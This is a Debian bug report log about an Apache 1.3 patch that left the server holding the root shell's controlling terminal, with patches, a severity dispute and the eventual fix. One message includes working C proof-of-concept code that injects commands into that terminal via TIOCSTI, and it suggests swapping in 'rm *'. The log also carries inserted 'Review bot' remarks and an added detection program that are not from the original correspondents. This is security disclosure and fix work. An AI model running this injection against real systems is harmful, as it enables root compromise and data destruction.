Debian Bug report logs - #357561
use setsid() to detach from controlling tty


Package: apache; Maintainer for apache is (unknown);

Reported by: dean gaudet <dean@arctic.org>

Date: Sat, 18 Mar 2006 04:33:05 UTC

Severity: important

Tags: patch, security

Found in versions apache/1.3.34-2, 1.3.33-6sarge3

Fixed in version apache/1.3.34-4.1

Done: Matthew Johnson <debian@matthew.ath.cx>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to dean gaudet <dean@arctic.org>:
New Bug report received and forwarded. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: dean gaudet <dean@arctic.org>
To: submit@bugs.debian.org
Subject: use setsid() to detach from controlling tty
Date: Fri, 17 Mar 2006 20:29:25 -0800 (PST)
Package: apache
Version: 1.3.34-2

i'm not sure i understand the motivation behind patch 033_-F_NO_SETSID ... 

the problem in #244857 is a result of the following behaviour of
setsid(2):

	On error, -1 is returned, and errno is set. The only error
	which can happen is EPERM. It is returned when the process
	group ID of any process equals the PID of the calling process.
	Thus, in particular, setsid() fails if the calling process is
	already a process group leader.

the user invoked "apache -F" which doesn't fork() before attempting
setsid() ... this fails with EPERM... and apache foolishly exits.

the real fix is to just warn on that error from setsid() and continue.

the fix that's currently in debian apache (use setpgrp()) leaves apache
with a controlling tty... which is a bad thing, see setpgrp(2):

	If a session has a controlling terminal, CLOCAL is not set and
	a hangup occurs, then the session leader is sent a SIGHUP. If
	the session leader exits, the SIGHUP signal will be sent to
	each process in the foreground process group of the controlling
	terminal.

please consider reverting 033_-F_NO_SETSID and/or allow setsid() to fail
with EPERM when do_detach == 0.

thanks
-dean



Severity set to `serious'. Request was from dean gaudet <dean@arctic.org> to control@bugs.debian.org. (full text, mbox, link).


Severity set to `normal'. Request was from Steve Langasek <vorlon@debian.org> to control@bugs.debian.org. (full text, mbox, link).


Severity set to `important'. Request was from dean gaudet <dean@arctic.org> to control@bugs.debian.org. (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Richard Thrippleton <ret28@cam.ac.uk>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #16 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Richard Thrippleton <ret28@cam.ac.uk>
To: 357561@bugs.debian.org
Subject: Relation to escalation to root
Date: Wed, 17 Jan 2007 17:42:15 +0000
If I have understood this correctly, preserving the controlling tty like this
allows an escalation from www-data to root. If, for example, I run
"/etc/init.d/apache start" from a root shell which I don't close soon after,
a resulting apache process running as www-data will share a controlling tty
with a root shell. A remote compromise of that process can then just inject
characters using TIOCSTI and execute commands as root.
In my opinion, it's not immensely unreasonable to manually bring down apache
and start it up again from a shell.
Why is this bug still unresolved after so long? The current workaround is of
course to immediately kill any terminal that has just invoked apache.

Richard



Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Richard Thrippleton <ret28@cam.ac.uk>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #21 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Richard Thrippleton <ret28@cam.ac.uk>
To: 357561@bugs.debian.org
Subject: CGI scripts can get root
Date: Mon, 22 Jan 2007 11:05:45 +0000
I noticed that suexec doesn't abdicate the controlling terminal either, and I'd
not be surprised to find out that non-suexec CGI invocation didn't do this
either. The result is that I've just been able to escalate from local user -->
root by writing a hostile CGI script - this is no longer just a case of having
to find an exploit in apache itself.

Richard



Tags added: security. Request was from Richard Thrippleton <ret28@cam.ac.uk> to control@bugs.debian.org. (full text, mbox, link).


Severity set to `critical' from `important'. Request was from Richard Thrippleton <ret28@cam.ac.uk> to control@bugs.debian.org. (full text, mbox, link).


Severity set to `important' from `critical'. Request was from Steve Langasek <vorlon@debian.org> to control@bugs.debian.org. (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Richard Thrippleton <ret28@cam.ac.uk>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #32 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Richard Thrippleton <ret28@cam.ac.uk>
To: 357561@bugs.debian.org
Subject: Proposed fix
Date: Tue, 30 Jan 2007 18:14:01 +0000
To fix this problem, revert the 033_-F_NO_SETSID patch. It only introduced
minor functionality, and if anyone really cares about having it, they can try
submitting a new patch. One that doesn't introduce a root exploit into the
package, ideally.

Richard



Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Matthew Johnson <debian@matthew.ath.cx>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #37 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Matthew Johnson <debian@matthew.ath.cx>
To: 357561@bugs.debian.org
Cc: control@bugs.debian.org
Subject: Fix with patch
Date: Fri, 23 Feb 2007 11:40:00 +0000 (GMT)

tags 357561 +patch
thanks

Replacing 033_-F_NO_SETSID with the attached patch which allows setsid()
to fail when do_detach == 0 should retain the fix for #244857 while also
closing the local root hole present with 033_-F_NO_SETSID.
514_nice_proxy_cache_cleanup also needs updating as it patches against
the same file (also attached).

I have prepared an NMU with the attached patches, which can be found at
http://mjj29.matthew.ath.cx/debian-upload/apache/. I hope that the RMs
will consider this change for etch as it closes a potential (if not
high-priority) root exploit in our apache package. I am not a DD, so I
shall be looking for a sponsor to upload this package if the apache
maintenance team don't do so first.

Matt

-- 
Matthew Johnson
http://www.matthew.ath.cx/
[033_SETSID_allowfail (text/plain, ATTACHMENT)]
diff -Naurd build-tree.orig/apache_1.3.34/src/main/http_main.c build-tree/apache_1.3.34/src/main/http_main.c
--- build-tree.orig/apache_1.3.34/src/main/http_main.c	2005-04-05 13:21:33.000000000 +0100
+++ build-tree/apache_1.3.34/src/main/http_main.c	2007-02-23 10:26:42.419661192 +0000
@@ -3451,7 +3451,10 @@
 	if (!do_detach) 
 	    fprintf(stderr, "setsid() failed probably because you aren't "
 		"running under a process management tool like daemontools\n");
-	exit(1);
+  /* Don't exit because of setsid() when we aren't
+   * detaching, it fails then anyway. */
+	else
+	   exit(1);
     }
 #elif defined(NEXT) || defined(NEWSOS)
     if (setpgrp(0, getpid()) == -1 || (pgrp = getpgrp(0)) == -1) {
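Review bot: the new `else` binds correctly to `if (!do_detach)` because the fprintf is a single statement, but the comment wedged between the `if` body and the `else` is brittle (anyone adding braces or a second statement to the `if` body has to move it) and is indented with spaces where the surrounding lines use tabs; move the comment above `if (!do_detach)` and indent it with tabs. With EPERM now tolerated, the message still printed in the `!do_detach` case ("setsid() failed probably because you aren't running under a process management tool like daemontools") no longer tells the operator the consequence, namely that the server continues with its controlling terminal, and errno is discarded; something like `fprintf(stderr, "setsid() failed (%s); continuing without detaching from the controlling terminal\n", strerror(errno));` would make the -F-from-a-shell case visible in the log.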
[514_nice_proxy_cache_cleanup (text/plain, ATTACHMENT)]
diff -Naurd build-tree.orig/apache_1.3.34/src/modules/proxy/proxy_cache.c build-tree/apache_1.3.34/src/modules/proxy/proxy_cache.c
--- build-tree.orig/apache_1.3.34/src/modules/proxy/proxy_cache.c	2007-02-23 11:00:19.641729000 +0000
+++ build-tree/apache_1.3.34/src/modules/proxy/proxy_cache.c	2007-02-23 11:01:29.490094942 +0000
@@ -191,6 +191,7 @@
 
         case 0:         /* Child */
             /* The setpgrp() stuff was snarfed from http_main.c */
+      	   nice(10);
 #ifndef NO_SETSID
             if ((pgrp = setsid()) == -1) {
                 perror("setsid");
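Review bot: the added `nice(10);` ignores the return value; nice() returns -1 on failure (EPERM, and on glibc a legitimate new niceness of -1 is only distinguishable via errno), so at minimum clear errno and log, e.g. `errno = 0; if (nice(10) == -1 && errno != 0) perror("nice");`. The line is also indented with a mix of spaces and a tab while the surrounding block uses spaces only. Since this hunk only re-aligns the existing 514 patch against the new setsid() handling, it is worth stating in the patch header that the cleanup child's own `setsid()` under `#ifndef NO_SETSID`, which the visible context shows merely perror()s on failure, is intentionally left alone.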

Tags added: patch. Request was from Matthew Johnson <debian@matthew.ath.cx> to control@bugs.debian.org. (full text, mbox, link).


Tags added: security. Request was from Loic Minier <lool@dooz.org> to control@bugs.debian.org. (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Kees Cook <kees@outflux.net>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #46 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Kees Cook <kees@outflux.net>
To: 357561@bugs.debian.org
Subject: reproduce?
Date: Mon, 26 Feb 2007 15:17:15 -0800
Can anyone reproduce this?  Apache seems to have closed the tty fd well 
before running a CGI.  I haven't been successful abusing it with 
TIOCSTI.  Does anyone see a way that this is actually a security 
problem?

-- 
Kees Cook                                            @outflux.net



Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Richard Thrippleton <ret28@cam.ac.uk>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #51 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Richard Thrippleton <ret28@cam.ac.uk>
To: 357561@bugs.debian.org
Subject: re: reproduce?
Date: Tue, 27 Feb 2007 00:15:06 +0000
Yes, Apache closes fds 0, 1 and 2 (well, reopens them to /dev/null), but
retains the controlling tty - this can be accessed via opening /dev/tty. The
controlling tty is a process property that is separate from the fds it has
open, and allows certain ioctl powers on any fd matching that. A 'ps' listing
will show the controlling tty of each process - you'll notice that most servers
have '?', but apache will have something of the form 'pts/n' or 'ttyn' so long
as the shell that spawned it is still open. This is the sample exploit code:

#include <fcntl.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <termios.h>
#include <unistd.h>

int main(void)
{
    /* Characters pushed into the controlling terminal's input queue one at a time. */
    const char *fake = "echo lol you got owned\n";
    const char *fake_ptr = fake;
    /* Reopen the controlling tty by name: fds 0-2 point at /dev/null, but the
     * controlling terminal is still a property of the process. */
    int pts = open("/dev/tty", O_RDONLY);
    if (pts < 0) {
        perror("open /dev/tty");
        return 1;
    }
    while (*fake_ptr != '\0') {
        if (ioctl(pts, TIOCSTI, fake_ptr) == -1) {
            perror("ioctl TIOCSTI");
            close(pts);
            return 1;
        }
        fake_ptr++;
    }
    close(pts);
    return 0;
}



Install it as a local user's CGI (I've verified this under suexec at least),
and have the webserver run it. If the shell that ran the apache init script is
still open, it will actually execute the command and echo out "lol you got
owned". Substitute this for "rm *" as you see fit.

Richard
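
Taken together, dean's note on setsid() semantics (message #5) and Richard's point above that the controlling tty is a process attribute separate from the open fds suggest a self-check a daemon, or an operator debugging a start script, can run. The following is an added example, not Apache's code and not the Debian patch; the function names are my own, and it assumes a POSIX system with a /dev/tty node:

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns 1 if the calling process has a controlling terminal, 0 if not.
 * The controlling tty belongs to the session, not to any open fd: a daemon
 * that has pointed fds 0-2 at /dev/null can still open it by name, which is
 * exactly what the TIOCSTI example above relies on. open("/dev/tty") fails
 * with ENXIO when the session has no terminal; other failures (e.g. no
 * /dev/tty node inside a chroot) are also reported as "none" here. */
int has_controlling_tty(void)
{
    int fd = open("/dev/tty", O_RDWR | O_NOCTTY);
    if (fd < 0)
        return 0;
    close(fd);
    return 1;
}

/* The setsid() policy argued for in this thread, in my own wording (this is
 * not the Debian patch):
 *  - do_detach != 0: the caller fork()ed first, so this process is not a
 *    process-group leader and setsid() cannot legitimately fail; any
 *    failure is fatal and returns -1.
 *  - do_detach == 0 (the "-F" case): the process may already be a group
 *    leader, e.g. a shell job, so EPERM is expected. Warn and return 0
 *    instead of exiting (exiting was the #244857 bug); the process then
 *    keeps whatever controlling tty it had, which the warning says. */
int detach_session(int do_detach)
{
    if (setsid() != (pid_t)-1)
        return 0;               /* new session: no controlling tty */
    if (!do_detach && errno == EPERM) {
        fprintf(stderr, "warning: setsid() failed (%s); continuing without "
                        "detaching from the controlling terminal\n",
                strerror(errno));
        return 0;
    }
    fprintf(stderr, "setsid() failed: %s\n", strerror(errno));
    return -1;
}

/* Exercises the detaching path without exiting the caller: fork a child
 * (a fresh child is never a group leader), let it run detach_session(1),
 * and report the child's has_controlling_tty() result. Returns 0 when the
 * child ended up without a controlling tty, 1 if it still had one, and -1
 * if the child could not be observed. */
int detached_child_has_tty(void)
{
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (detach_session(1) != 0)
            _exit(2);
        _exit(has_controlling_tty());
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status) == 2 ? -1 : WEXITSTATUS(status);
}

int main(void)
{
    /* Run from an interactive shell, the "-F" path below normally prints
     * the EPERM warning and the tty stays present: that is the state the
     * thread describes. The forked child always ends up detached. */
    printf("before: controlling tty %s\n",
           has_controlling_tty() ? "present" : "absent");
    detach_session(0);
    printf("after -F style detach_session(0): controlling tty %s\n",
           has_controlling_tty() ? "present" : "absent");
    printf("forked child after detach_session(1): controlling tty %s\n",
           detached_child_has_tty() == 0 ? "absent" : "present or unknown");
    return 0;
}
```

Comparing the first two lines of output with the third is the practical check: a server whose `ps` TTY column is not `?` after startup is still in the shell's session.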



Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Kees Cook <kees@outflux.net>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #56 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Kees Cook <kees@outflux.net>
To: 357561@bugs.debian.org
Subject: ah, yes
Date: Mon, 26 Feb 2007 20:41:57 -0800
Ah yeah, I need to read my Stevens book a bit more closely.  Duh, reopen 
/dev/tty.  So, yes, I can totally confirm this problem.

-- 
Kees Cook                                            @outflux.net



Severity set to `grave' from `important'. Request was from Kees Cook <kees@outflux.net> to control@bugs.debian.org. (full text, mbox, link).


Severity set to `important' from `grave'. Request was from Steve Langasek <vorlon@debian.org> to control@bugs.debian.org. (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Stefan Foerster <stefan@stefan-foerster.de>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #65 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Stefan Foerster <stefan@stefan-foerster.de>
To: Debian Bug Tracking System <357561@bugs.debian.org>
Subject: apache: Patch included in sarge?
Date: Tue, 27 Feb 2007 21:19:57 +0100
Package: apache
Version: 1.3.33-6sarge3
Followup-For: Bug #357561


I noticed that this patch is included in the source package you get by typing
"apt get source apache", diff file is apache_1.3.33-6sarge3.diff.gz. I made
a diff of both patches and apart from line numbers, they seem to be the same.


-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.4.20-wolk4.18s
Locale: LANG=C, LC_CTYPE=de_DE@euro (charmap=ISO-8859-15)

Versions of packages apache depends on:
ii  apache-common         1.3.33-6sarge3     support files for all Apache webse
ii  debconf               1.4.30.13          Debian configuration management sy
ii  dpkg                  1.10.28            Package maintenance system for Deb
ii  libc6                 2.3.2.ds1-22sarge5 GNU C Library: Shared libraries an
ii  libdb4.2              4.2.52-18          Berkeley v4.2 Database Libraries [
ii  libexpat1             1.95.8-3           XML parsing C library - runtime li
ii  libmagic1             4.12-1             File type determination library us
ii  logrotate             3.7-5              Log rotation utility
ii  mime-support          3.28-1             MIME files 'mime.types' & 'mailcap
ii  perl                  5.8.4-8sarge5      Larry Wall's Practical Extraction 

-- debconf information excluded



Information forwarded to debian-bugs-dist@lists.debian.org, debian-security@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Daniel Leidert <daniel.leidert@wgdd.de>:
Extra info received and forwarded to list. Copy sent to debian-security@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #70 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Daniel Leidert <daniel.leidert@wgdd.de>
To: Debian Bug Tracking System <357561@bugs.debian.org>
Subject: privilege escalation hole
Date: Thu, 01 Mar 2007 04:30:58 +0100
Package: apache
Followup-For: Bug #357561


Why isn't anybody of the official maintainers reacting or commenting on
this bug? There are 3(!) completely undocumented downgrades of a bug
that IMHO (from reading) fits the "grave" severity. Please react or comment
on when we can expect a fixed package, or on why this bug's severity can be
downgraded; otherwise the situation will become really annoying.

CCing debian-security

Regards, Daniel

-- System Information:
Debian Release: 4.0
  APT prefers unstable
  APT policy: (850, 'unstable'), (700, 'testing'), (550, 'stable'), (110, 'experimental')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18.11
Locale: LANG=de_DE, LC_CTYPE=de_DE (charmap=ISO-8859-1)

Versions of packages apache depends on:
ii  apache-common               1.3.34-4     support files for all Apache webse
ii  debconf [debconf-2.0]       1.5.12       Debian configuration management sy
ii  libc6                       2.3.6.ds1-13 GNU C Library: Shared libraries
ii  libdb4.4                    4.4.20-8     Berkeley v4.4 Database Libraries [
ii  libexpat1                   1.95.8-3.4   XML parsing C library - runtime li
ii  libmagic1                   4.19-1       File type determination library us
ii  logrotate                   3.7.1-3      Log rotation utility
ii  lsb-base                    3.1-23       Linux Standard Base 3.1 init scrip
ii  mime-support                3.39-1       MIME files 'mime.types' & 'mailcap
ii  perl                        5.8.8-7      Larry Wall's Practical Extraction 

apache recommends no packages.

-- debconf information excluded




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Russ Allbery <rra@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #75 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Russ Allbery <rra@debian.org>
To: Daniel Leidert <daniel.leidert@wgdd.de>
Cc: 357561@bugs.debian.org
Subject: Re: Bug#357561: privilege escalation hole
Date: Wed, 28 Feb 2007 19:45:28 -0800
Daniel Leidert <daniel.leidert@wgdd.de> writes:

> Package: apache
> Followup-For: Bug #357561

> Why isn't anybody of the official maintainers reacting or commenting on
> this bug? There are 3(!) completely undocumented downgrades of a bug,
> that IMHO (from reading) fits the "grave" severity.

The downgrades aren't undocumented.  Look at the full downgrade messages.
The first time it was downgraded, the comment was:

    unexplained severity inflation

Then an explanation was added, and the second time the bug was downgraded,
the comment was:

    holes depending on terminal exploits have not been treated as RC

which I believe is still correct.

Controlling terminal exploits are possible but hard, and in this
particular case, requires a fairly specific alignment of issues: Apache
must be started with -F, which is an unusual way of running Apache to
start with, and the root shell has to be left open long enough for someone
to discover this state and run an exploit.  Usually people who routinely
run Apache with -F are doing so via something like runit or supervise,
which already won't have a controlling terminal, and running Apache -F by
hand is normally only done for debugging.

I certainly agree that it would be good to fix the bug, but I also can see
why the severity was downgraded.

-- 
Russ Allbery (rra@debian.org)               <http://www.eyrie.org/~eagle/>



Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Joey Hess <joeyh@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #80 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Joey Hess <joeyh@debian.org>
To: Daniel Leidert <daniel.leidert@wgdd.de>, 357561@bugs.debian.org
Subject: Re: Bug#357561: privilege escalation hole
Date: Wed, 28 Feb 2007 23:32:23 -0500
Daniel Leidert wrote:
> Why isn't anybody of the official maintainers reacting or commenting on
> this bug? There are 3(!) completely undocumented downgrades of a bug,

# holes depending on terminal exploits have not been treated as RC

I suspect that the above downgrade message from vorlon is the one that
you missed seeing. He's probably referring to various other terminal
exploits, such as escape character issues with eterm. This seems like a
significantly different class of problem than those, though, IMHO.

OTOH, not all security holes are grave and the circumstances needed to
exploit this one seem sufficiently rare to not consider it grave.

On the third hand, this bug has documented a security hole with exploit
in apache for about 2 weeks without any reaction from its maintainers,
and was open for many months before that without any reaction from them.
If apache isn't being maintained, it might be better to drop it from
etch anyway.

-- 
see shy jo

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Jeroen van Wolffelaar <jeroen@wolffelaar.nl>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #85 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Jeroen van Wolffelaar <jeroen@wolffelaar.nl>
To: Russ Allbery <rra@debian.org>, 357561@bugs.debian.org
Cc: Daniel Leidert <daniel.leidert@wgdd.de>
Subject: Re: Bug#357561: privilege escalation hole
Date: Thu, 1 Mar 2007 08:09:50 +0100
On Wed, Feb 28, 2007 at 07:45:28PM -0800, Russ Allbery wrote:
> I certainly agree that it would be good to fix the bug, but I also can see
> why the severity was downgraded.

I think Russ explained pretty nicely why this escalation is pretty rare
from being a true vulnerability, although there indeed is an attack
window if you do -F, forget about it, forget about the terminal (until
cron.daily where apache gets restarted by logrotate).

Anyway, from talking to Fabbione, NMU's are always welcome if someone
wants to properly test the patch such that it does what it claims it
does -- the idea behind the patch is ok in any case.

--Jeroen

-- 
Jeroen van Wolffelaar
Jeroen@wolffelaar.nl (also for Jabber & MSN; ICQ: 33944357)
http://Jeroen.A-Eskwadraat.nl



Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Adam Conrad <adconrad@0c3.net>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #90 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Adam Conrad <adconrad@0c3.net>
To: Joey Hess <joeyh@debian.org>, 357561@bugs.debian.org
Cc: Daniel Leidert <daniel.leidert@wgdd.de>
Subject: Re: Bug#357561: privilege escalation hole
Date: Thu, 01 Mar 2007 18:14:41 +1100
Joey Hess wrote:
> 
> On the third hand, this bug has documented a security hole with exploit
> in apache for about 2 weeks without any reaction from its maintainers,
> and was open for many months before that without any reaction from them.
> If apache isn't being maintained, it might be better to drop it from
> etch anyway.

I have every intention of uploading to fix this ASAP, this week's just
been... "Special".

... Adam



Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Jeroen van Wolffelaar <jeroen@wolffelaar.nl>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #95 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Jeroen van Wolffelaar <jeroen@wolffelaar.nl>
To: Adam Conrad <adconrad@0c3.net>, 357561@bugs.debian.org
Cc: Joey Hess <joeyh@debian.org>, Daniel Leidert <daniel.leidert@wgdd.de>
Subject: Re: Bug#357561: privilege escalation hole
Date: Thu, 1 Mar 2007 08:31:47 +0100
On Thu, Mar 01, 2007 at 06:14:41PM +1100, Adam Conrad wrote:
> Joey Hess wrote:
> > 
> > On the third hand, this bug has documented a security hole with exploit
> > in apache for about 2 weeks without any reaction from its maintainers,
> > and was open for many months before that without any reaction from them.
> > If apache isn't being maintained, it might be better to drop it from
> > etch anyway.
> 
> I have every intention of uploading to fix this ASAP, this week's just
> been... "Special".

Just as every other week from mid-march 2006 till now :)?

--Jeroen

-- 
Jeroen van Wolffelaar
Jeroen@wolffelaar.nl (also for Jabber & MSN; ICQ: 33944357)
http://Jeroen.A-Eskwadraat.nl



Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Matthew Johnson <debian@matthew.ath.cx>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #100 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Matthew Johnson <debian@matthew.ath.cx>
To: 357561@bugs.debian.org
Subject: Re: Bug#357561: privilege escalation hole
Date: Thu, 1 Mar 2007 09:32:42 +0000 (GMT)
The description given is somewhat incorrect. The escalation exists
whether run with -F or not. 033_-F_NO_SETSID disables running setsid in
all cases. This means that running /etc/init.d/apache start and then not
closing the terminal (and people do have long-running shells like this)
leaves you vulnerable---this has been verified by Richard Thrippleton.

I've tested my patch and it closes this vulnerability while still
allowing use of apache with -F. Please could someone upload the NMU I
linked to above.

Thanks,
Matt

-- 
Matthew Johnson
http://www.matthew.ath.cx/



Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Richard Thrippleton <ret28@cam.ac.uk>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #105 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Richard Thrippleton <ret28@cam.ac.uk>
To: 357561@bugs.debian.org
Subject: Severity
Date: Thu, 1 Mar 2007 11:19:42 +0000
As the person who found and has thoroughly tested this bug, I can confirm
firsthand that this isn't just a case of apache being vulnerable with "-F"! I
specifically mentioned using the init script in the original report over a
month ago, not "-F". That is, the circumstances required to exploit this are
not 'rare'.
With this in mind, I'm still confused as to why if you can root a machine with
a buffer overflow, it's critical, but if you can root a machine using a
terminal exploit, it's not. Either way, you end up with an owned machine, the
method is unimportant.

Richard



Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Daniel Leidert <daniel.leidert@wgdd.de>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #110 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Daniel Leidert <daniel.leidert@wgdd.de>
To: 357561@bugs.debian.org
Cc: ml_debian-security <debian-security@lists.debian.org>
Subject: Re: Bug#357561: privilege escalation hole
Date: Thu, 01 Mar 2007 16:49:38 +0100
On Wednesday, 28.02.2007, at 19:45 -0800, Russ Allbery wrote:
> Daniel Leidert <daniel.leidert@wgdd.de> writes:
> 
> > Package: apache
> > Followup-For: Bug #357561
> 
> > Why isn't anybody of the official maintainers reacting or commenting on
> > this bug? There are 3(!) completely undocumented downgrades of a bug,
> > that IMHO (from reading) fits the "grave" severity.
> 
> The downgrades aren't undocumented.  Look at the full downgrade messages.

I'm sorry. You are right. I was just taking an overview of the full
texts and expected any comment after the bts-command. I see it now and I
say sorry to Steve Langasek. I was in a hurry and annoyed by the fact
that although this bug has now been open for almost a year, there were 3
severity downgrades but no real reaction. I didn't know about that special
treatment of terminal exploits.

Regards, Daniel




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Moritz Muehlenhoff <jmm@inutil.org>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #115 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Moritz Muehlenhoff <jmm@inutil.org>
To: Joey Hess <joeyh@debian.org>
Cc: Daniel Leidert <daniel.leidert@wgdd.de>, 357561@bugs.debian.org
Subject: Re: Bug#357561: privilege escalation hole
Date: Fri, 2 Mar 2007 00:33:56 +0100
Joey Hess wrote:
> On the third hand, this bug has documented a security hole with exploit
> in apache for about 2 weeks without any reaction from its maintainers,
> and was open for many months before that without any reaction from them.
> If apache isn't being maintained, it might be better to drop it from
> etch anyway.

Indeed, I'm quite disappointed about apache 1.3 still being in Etch.
Debian is the _only_ distribution still shipping it; the maintainers
couldn't provide _any_ valid reason to still include it (like an important
module not ported to 2.x) and claimed that they would provide all security
updates for 1.3 issues. Well...

Cheers,
        Moritz



Reply sent to Matthew Johnson <debian@matthew.ath.cx>:
You have taken responsibility. (full text, mbox, link).


Notification sent to dean gaudet <dean@arctic.org>:
Bug acknowledged by developer. (full text, mbox, link).


Message #120 received at 357561-close@bugs.debian.org (full text, mbox, reply):

